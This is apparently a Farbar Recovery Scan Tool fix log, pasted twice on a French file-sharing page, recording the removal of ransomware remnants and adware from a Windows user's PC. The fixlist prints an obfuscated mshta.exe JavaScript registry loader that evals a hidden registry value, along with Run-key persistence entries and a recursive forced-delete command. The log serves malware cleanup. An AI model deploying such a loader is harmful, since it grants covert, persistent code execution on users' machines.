Publicité
Publicité
Format du document : text/plain
Prévisualisation
Fix result of Farbar Recovery Scan Tool (x64) Version: 17-12-2016
Ran by jacqu (18-12-2016 21:37:29) Run:2
Running from C:\Users\jacqu\Desktop
Loaded Profiles: jacqu (Available Profiles: jacqu)
Boot Mode: Normal
==============================================
fixlist content:
*****************
CloseProcesses:
CreateRestorePoint:
EmptyTemp:
Cmd: del C:\*_README_*.* /a/s/f/q
() C:\ProgramData\Microsoft\Performance\Monitor\temp\tmp6807.exe
HKU\S-1-5-21-2509339021-571332613-1028944455-1001\...\Run: [YbPack] => C:\Users\jacqu\AppData\Local\YbPack\tmp6807.exe [175052 2016-12-18] ()
C:\Users\jacqu\AppData\Local\YbPack
HKU\S-1-5-21-2509339021-571332613-1028944455-1001\...\Run: [**nptp<*>] => "C:\Users\jacqu\AppData\Local\cafe\4c87.bat"
C:\Users\jacqu\AppData\Local\cafe
SearchScopes: HKLM-x32 -> {930A224D-91D9-46AB-A7C9-8D1096794D72} URL = hxxp://www.amazon.co.uk/s/ref=azs_osd_ieauk?ie=UTF-8&tag=hp-uk3-vsb-21&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
SearchScopes: HKU\S-1-5-21-2509339021-571332613-1028944455-1001 -> {930A224D-91D9-46AB-A7C9-8D1096794D72} URL = hxxp://www.amazon.co.uk/s/ref=azs_osd_ieauk?ie=UTF-8&tag=hp-uk3-vsb-21&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
FF Extension: (PSFactoryBuffer) - C:\Users\jacqu\AppData\Roaming\Mozilla\Firefox\Profiles\6et8u4ni.default\Extensions\{4FDE5BF0-2E49-E1C9-0B26-9DD4705F0FA0} [2016-12-13] [not signed]
2016-12-18 07:43 - 2016-12-18 07:43 - 00066409 _____ C:\Users\jacqu\Desktop\_README_5AGW_.hta
2016-12-18 07:32 - 2016-12-18 07:32 - 00066409 _____ C:\Users\jacqu\Downloads\_README_B270_.hta
2016-12-18 00:27 - 2016-12-18 00:27 - 00172598 _____ C:\Users\jacqu\AppData\Roaming\Fulminate.yg
2016-12-16 22:52 - 2016-12-16 22:52 - 00088576 _____ C:\Users\jacqu\AppData\Roaming\stagnation.dll
2016-12-16 19:48 - 2016-12-18 07:32 - 00282709 _____ C:\Users\jacqu\Downloads\GmrxtjCqmG.98ad
2016-12-16 19:48 - 2016-12-16 19:48 - 00000168 _____ C:\Users\jacqu\Downloads\ATT00001.htm
2016-12-13 20:18 - 2016-12-13 20:18 - 00000000 ____D C:\Users\jacqu\AppData\Local\cafe
2016-12-13 19:49 - 2016-12-18 07:07 - 00000000 ____D C:\Users\jacqu\AppData\Local\AZworks
2016-12-13 19:48 - 2016-12-18 07:47 - 00000000 ____D C:\Users\jacqu\AppData\Local\YbPack
2016-12-13 19:35 - 2016-12-13 19:52 - 00000000 ___HD C:\Users\jacqu\AppData\Local\SysHashTable
2016-08-22 00:30 - 2016-08-22 00:30 - 0000000 _____ () C:\Users\jacqu\AppData\Local\{DB7DE689-648D-40B7-A16A-6342F8B1B6FD}
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Priceline.com.lnk -> C:\Program Files (x86)\Hewlett-Packard\Shared\WizLink.exe () -> hxxp://www.priceline.com/?refid=PLHBC6240OPQ&refclickid=square
HKU\S-1-5-21-2509339021-571332613-1028944455-1001\Software\Classes\f0da: "C:\WINDOWS\system32\mshta.exe" "javascript:TPAi5AKF="Ow";K8z5=new ActiveXObject("WScript.Shell" );pi87Cl="l";kn71kz=K8z5.RegRead("HKCU\\software\\qdssp\\cmtbmdfyc" );m7BDu4V="Oy";eval(kn71kz);K5sVmAys="RLjiWneK";"
*****************
Processes closed successfully.
Restore point was successfully created.
========= del C:\*_README_*.* /a/s/f/q =========
Could Not Find C:\*_README_*.*
========= End of CMD: =========
C:\ProgramData\Microsoft\Performance\Monitor\temp\tmp6807.exe => No running process found
HKU\S-1-5-21-2509339021-571332613-1028944455-1001\Software\Microsoft\Windows\CurrentVersion\Run\\YbPack => value not found.
"C:\Users\jacqu\AppData\Local\YbPack" => not found.
HKU\S-1-5-21-2509339021-571332613-1028944455-1001\Software\Microsoft\Windows\CurrentVersion\Run\\**nptp<*> => value not found.
"C:\Users\jacqu\AppData\Local\cafe" => not found.
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{930A224D-91D9-46AB-A7C9-8D1096794D72} => key not found.
HKCR\Wow6432Node\CLSID\{930A224D-91D9-46AB-A7C9-8D1096794D72} => key not found.
HKU\S-1-5-21-2509339021-571332613-1028944455-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{930A224D-91D9-46AB-A7C9-8D1096794D72} => key not found.
HKCR\CLSID\{930A224D-91D9-46AB-A7C9-8D1096794D72} => key not found.
C:\Users\jacqu\AppData\Roaming\Mozilla\Firefox\Profiles\6et8u4ni.default\Extensions\{4FDE5BF0-2E49-E1C9-0B26-9DD4705F0FA0} => not found.
"C:\Users\jacqu\Desktop\_README_5AGW_.hta" => not found.
"C:\Users\jacqu\Downloads\_README_B270_.hta" => not found.
"C:\Users\jacqu\AppData\Roaming\Fulminate.yg" => not found.
"C:\Users\jacqu\AppData\Roaming\stagnation.dll" => not found.
"C:\Users\jacqu\Downloads\GmrxtjCqmG.98ad" => not found.
"C:\Users\jacqu\Downloads\ATT00001.htm" => not found.
"C:\Users\jacqu\AppData\Local\cafe" => not found.
"C:\Users\jacqu\AppData\Local\AZworks" => not found.
"C:\Users\jacqu\AppData\Local\YbPack" => not found.
"C:\Users\jacqu\AppData\Local\SysHashTable" => not found.
C:\Users\jacqu\AppData\Local\{DB7DE689-648D-40B7-A16A-6342F8B1B6FD} => moved successfully
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Priceline.com.lnk => Shortcut argument removed successfully.
"HKU\S-1-5-21-2509339021-571332613-1028944455-1001\Software\Classes\f0da" => key removed successfully
=========== EmptyTemp: ==========
BITS transfer queue => 0 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 16143822 B
Java, Flash, Steam htmlcache => 729 B
Windows/system/drivers => 1505228 B
Edge => 85049 B
Chrome => 167338961 B
Firefox => 6921353 B
Opera => 0 B
Temp, IE cache, history, cookies, recent:
Default => 6656 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 0 B
systemprofile32 => 0 B
LocalService => 0 B
NetworkService => 587810 B
jacqu => 5723142 B
RecycleBin => 97321692 B
EmptyTemp: => 281.9 MB temporary data Removed.
================================
The system needed a reboot.
==== End of Fixlog 21:38:59 ====
Ran by jacqu (18-12-2016 21:37:29) Run:2
Running from C:\Users\jacqu\Desktop
Loaded Profiles: jacqu (Available Profiles: jacqu)
Boot Mode: Normal
==============================================
fixlist content:
*****************
CloseProcesses:
CreateRestorePoint:
EmptyTemp:
Cmd: del C:\*_README_*.* /a/s/f/q
() C:\ProgramData\Microsoft\Performance\Monitor\temp\tmp6807.exe
HKU\S-1-5-21-2509339021-571332613-1028944455-1001\...\Run: [YbPack] => C:\Users\jacqu\AppData\Local\YbPack\tmp6807.exe [175052 2016-12-18] ()
C:\Users\jacqu\AppData\Local\YbPack
HKU\S-1-5-21-2509339021-571332613-1028944455-1001\...\Run: [**nptp<*>] => "C:\Users\jacqu\AppData\Local\cafe\4c87.bat"
C:\Users\jacqu\AppData\Local\cafe
SearchScopes: HKLM-x32 -> {930A224D-91D9-46AB-A7C9-8D1096794D72} URL = hxxp://www.amazon.co.uk/s/ref=azs_osd_ieauk?ie=UTF-8&tag=hp-uk3-vsb-21&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
SearchScopes: HKU\S-1-5-21-2509339021-571332613-1028944455-1001 -> {930A224D-91D9-46AB-A7C9-8D1096794D72} URL = hxxp://www.amazon.co.uk/s/ref=azs_osd_ieauk?ie=UTF-8&tag=hp-uk3-vsb-21&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
FF Extension: (PSFactoryBuffer) - C:\Users\jacqu\AppData\Roaming\Mozilla\Firefox\Profiles\6et8u4ni.default\Extensions\{4FDE5BF0-2E49-E1C9-0B26-9DD4705F0FA0} [2016-12-13] [not signed]
2016-12-18 07:43 - 2016-12-18 07:43 - 00066409 _____ C:\Users\jacqu\Desktop\_README_5AGW_.hta
2016-12-18 07:32 - 2016-12-18 07:32 - 00066409 _____ C:\Users\jacqu\Downloads\_README_B270_.hta
2016-12-18 00:27 - 2016-12-18 00:27 - 00172598 _____ C:\Users\jacqu\AppData\Roaming\Fulminate.yg
2016-12-16 22:52 - 2016-12-16 22:52 - 00088576 _____ C:\Users\jacqu\AppData\Roaming\stagnation.dll
2016-12-16 19:48 - 2016-12-18 07:32 - 00282709 _____ C:\Users\jacqu\Downloads\GmrxtjCqmG.98ad
2016-12-16 19:48 - 2016-12-16 19:48 - 00000168 _____ C:\Users\jacqu\Downloads\ATT00001.htm
2016-12-13 20:18 - 2016-12-13 20:18 - 00000000 ____D C:\Users\jacqu\AppData\Local\cafe
2016-12-13 19:49 - 2016-12-18 07:07 - 00000000 ____D C:\Users\jacqu\AppData\Local\AZworks
2016-12-13 19:48 - 2016-12-18 07:47 - 00000000 ____D C:\Users\jacqu\AppData\Local\YbPack
2016-12-13 19:35 - 2016-12-13 19:52 - 00000000 ___HD C:\Users\jacqu\AppData\Local\SysHashTable
2016-08-22 00:30 - 2016-08-22 00:30 - 0000000 _____ () C:\Users\jacqu\AppData\Local\{DB7DE689-648D-40B7-A16A-6342F8B1B6FD}
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Priceline.com.lnk -> C:\Program Files (x86)\Hewlett-Packard\Shared\WizLink.exe () -> hxxp://www.priceline.com/?refid=PLHBC6240OPQ&refclickid=square
HKU\S-1-5-21-2509339021-571332613-1028944455-1001\Software\Classes\f0da: "C:\WINDOWS\system32\mshta.exe" "javascript:TPAi5AKF="Ow";K8z5=new ActiveXObject("WScript.Shell" );pi87Cl="l";kn71kz=K8z5.RegRead("HKCU\\software\\qdssp\\cmtbmdfyc" );m7BDu4V="Oy";eval(kn71kz);K5sVmAys="RLjiWneK";"
*****************
Processes closed successfully.
Restore point was successfully created.
========= del C:\*_README_*.* /a/s/f/q =========
Could Not Find C:\*_README_*.*
========= End of CMD: =========
C:\ProgramData\Microsoft\Performance\Monitor\temp\tmp6807.exe => No running process found
HKU\S-1-5-21-2509339021-571332613-1028944455-1001\Software\Microsoft\Windows\CurrentVersion\Run\\YbPack => value not found.
"C:\Users\jacqu\AppData\Local\YbPack" => not found.
HKU\S-1-5-21-2509339021-571332613-1028944455-1001\Software\Microsoft\Windows\CurrentVersion\Run\\**nptp<*> => value not found.
"C:\Users\jacqu\AppData\Local\cafe" => not found.
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{930A224D-91D9-46AB-A7C9-8D1096794D72} => key not found.
HKCR\Wow6432Node\CLSID\{930A224D-91D9-46AB-A7C9-8D1096794D72} => key not found.
HKU\S-1-5-21-2509339021-571332613-1028944455-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{930A224D-91D9-46AB-A7C9-8D1096794D72} => key not found.
HKCR\CLSID\{930A224D-91D9-46AB-A7C9-8D1096794D72} => key not found.
C:\Users\jacqu\AppData\Roaming\Mozilla\Firefox\Profiles\6et8u4ni.default\Extensions\{4FDE5BF0-2E49-E1C9-0B26-9DD4705F0FA0} => not found.
"C:\Users\jacqu\Desktop\_README_5AGW_.hta" => not found.
"C:\Users\jacqu\Downloads\_README_B270_.hta" => not found.
"C:\Users\jacqu\AppData\Roaming\Fulminate.yg" => not found.
"C:\Users\jacqu\AppData\Roaming\stagnation.dll" => not found.
"C:\Users\jacqu\Downloads\GmrxtjCqmG.98ad" => not found.
"C:\Users\jacqu\Downloads\ATT00001.htm" => not found.
"C:\Users\jacqu\AppData\Local\cafe" => not found.
"C:\Users\jacqu\AppData\Local\AZworks" => not found.
"C:\Users\jacqu\AppData\Local\YbPack" => not found.
"C:\Users\jacqu\AppData\Local\SysHashTable" => not found.
C:\Users\jacqu\AppData\Local\{DB7DE689-648D-40B7-A16A-6342F8B1B6FD} => moved successfully
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Priceline.com.lnk => Shortcut argument removed successfully.
"HKU\S-1-5-21-2509339021-571332613-1028944455-1001\Software\Classes\f0da" => key removed successfully
=========== EmptyTemp: ==========
BITS transfer queue => 0 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 16143822 B
Java, Flash, Steam htmlcache => 729 B
Windows/system/drivers => 1505228 B
Edge => 85049 B
Chrome => 167338961 B
Firefox => 6921353 B
Opera => 0 B
Temp, IE cache, history, cookies, recent:
Default => 6656 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 0 B
systemprofile32 => 0 B
LocalService => 0 B
NetworkService => 587810 B
jacqu => 5723142 B
RecycleBin => 97321692 B
EmptyTemp: => 281.9 MB temporary data Removed.
================================
The system needed a reboot.
==== End of Fixlog 21:38:59 ====